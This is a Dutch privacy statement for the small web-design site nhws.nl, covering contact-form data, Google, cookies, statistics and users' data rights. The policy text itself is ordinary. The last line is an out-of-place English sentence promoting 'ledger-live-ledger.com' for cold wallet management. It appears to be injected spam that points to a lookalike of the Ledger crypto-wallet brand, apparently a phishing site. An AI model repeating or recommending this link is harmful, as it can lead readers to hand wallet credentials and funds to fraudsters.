Uw Privacy bij NHWS

UW PRIVACY IS OOK VOOR MIJ BELANGRIJK

1 oktober 2021

Via mijn website worden privacygevoelige gegevens oftewel persoonsgegevens verwerkt. NHWS acht een zorgvuldige omgang met persoonsgegevens van groot belang. Persoonlijke gegevens worden door mij dan ook zorgvuldig verwerkt en beveiligd.

Bij verwerking houd ik mij aan de eisen die de privacywetgeving stelt. Dat betekent onder andere dat ik:

 • mijn doeleinden duidelijk specificeren voordat ik persoonsgegevens verwerk, via deze privacyverklaring;
 • mijn verzameling van persoonsgegevens beperken tot alleen de persoonsgegevens die nodig zijn voor legitieme doeleinden;
 • u eerst expliciet toestemming vragen om uw persoonsgegevens te verwerken in gevallen waarin uw toestemming is vereist;
 • passende beveiligingsmaatregelen nemen om uw persoonsgegevens te beschermen en dat ook eisen van partijen die in mijn opdracht persoonsgegevens verwerken;
 • uw recht respecteren om uw persoonsgegevens op uw aanvraag ter inzage te bieden, te corrigeren of te verwijderen.

NHWS is de verantwoordelijke voor de gegevensverwerking. In deze privacyverklaring leg ik uit welke persoonsgegevens ik verzamel en gebruik en met welk doel bij de website www.nhws.nl. Ik raad u aan deze zorgvuldig te lezen.

Als u vragen heeft, of wilt weten wat ik precies van u bijhoud, neem dan contact op met NHWS.

Contactformulier
Met het contactformulier kunt u mij vragen stellen of aanvragen doen. Hiervoor gebruik ik uw naw-gegevens, telefoonnummer, e-mailadres en ip-adres. Hier heb ik een legitiem belang bij. Ik bewaar deze informatie totdat ik zeker weet dat u tevreden bent met mijn reactie en zes maanden daarna. Zo kan ik bij vervolgvragen de informatie er makkelijk bij pakken. Ook kan ik zo mijn klantenservice verbeteren.

Verstrekken aan derden
Zonder uw expliciete toestemming worden uw gegevens niet gedeeld met derde partijen.

Statistieken en profilering
Ik houd statistieken bij over het gebruik van mijn website, maar dit gebeurt te allen tijde geanonimiseerd. Met deze statistieken verbeteren ik mijn website om zo bijvoorbeeld alleen nog relevante informatie te laten zien. Ik kan uw persoonsgegevens met elkaar combineren om meer over u te weten te komen. Uiteraard zal ik uw privacy te allen tijde respecteren. Wil u dit niet, dan kunt u dit altijd aan mij melden. Hier heb ik een legitiem belang bij. Wij bewaren deze informatie voor één jaar.

Verstrekken aan derden
Ik werk met Google samen, die uw hierboven genoemde gegevens kan inzien.

Verstrekking aan andere bedrijven of instellingen
Met uitzondering van de hierboven genoemde partners, geef ik uw (persoons)gegevens onder geen voorwaarde aan andere bedrijven of instellingen, behalve als ik dat wettelijk verplicht ben (bijvoorbeeld als de politie dat eist bij een vermoeden van een misdrijf).

Statistieken
Ik houd statistieken bij over het gebruik van mijn website, maar deze gegevens zijn altijd geanonimiseerd.

Cookies
Mijn website gebruikt cookies. Cookies zijn kleine bestandjes waar ik informatie in kan opslaan zodat u die niet steeds hoeft in te vullen. Maar ik kan er ook mee zien dat u www.nhws.nl weer bezoekt.

Wanneer u mijn website voor het eerst bezoekt, toon ik een melding met uitleg over cookies. Hierbij vraag ik om uw akkoord voor het gebruik van deze cookies.

U kunt via uw browser het plaatsen van cookies uitschakelen, maar sommige dingen van mijn website werken dan niet goed meer.

Met andere bedrijven die cookies plaatsen heb ik afspraken gemaakt over het gebruik van de cookies. Toch heb ik geen volledige controle op wat zij zelf met de cookies doen. Lees dus ook hun privacyverklaringen. (Let op: deze kunnen regelmatig wijzigen)

Beveiliging
De beveiliging van persoonsgegevens is voor mij van groot belang. Ik zorg dat uw gegevens goed beveiligd zijn. Ik pas de beveiliging steeds aan en let goed op wat er mis kan gaan.

Wijzigingen in deze privacyverklaring
Ik behoud mij het recht voor om wijzigingen aan te brengen in deze privacyverklaring. Het verdient aanbeveling om deze privacyverklaring geregeld te raadplegen, zodat u van deze wijzigingen op de hoogte bent. Ik zal mijn best doen wijzigingen ook apart aan te kondigen.

Inzage, wijzigen en verwijderen van uw gegevens
Als u vragen hebt of wilt weten welke persoonsgegevens ik van u heb, kunt u altijd contact met mij opnemen. Zie de contactgegevens hieronder.

U hebt de volgende rechten:

 • uitleg krijgen over welke persoonsgegevens ik heb en wat ik daarmee doe
 • inzage in de precieze persoonsgegevens die ik heb
 • het laten corrigeren van fouten
 • het laten verwijderen van verouderde persoonsgegevens
 • het laten overdragen van persoonsgegevens naar een andere partij
 • intrekken van toestemming
 • bezwaar maken tegen een bepaald gebruik

Let op dat u altijd duidelijk aangeeft wie u bent, zodat ik zeker weten dat ik geen gegevens van de verkeerde persoon aanpas of verwijder.

Klacht indienen
Als u vindt dat ik u niet op de juiste manier help, dan heeft u het recht om een klacht in te dienen bij de toezichthouder. Deze heet de Autoriteit Persoonsgegevens.

Contactgegevens
NHWS / nh websites
info@nhws.nl
072-5320370

Explore the enhanced security measures offered by https://ledger-live-ledger.com/ for cold wallet management.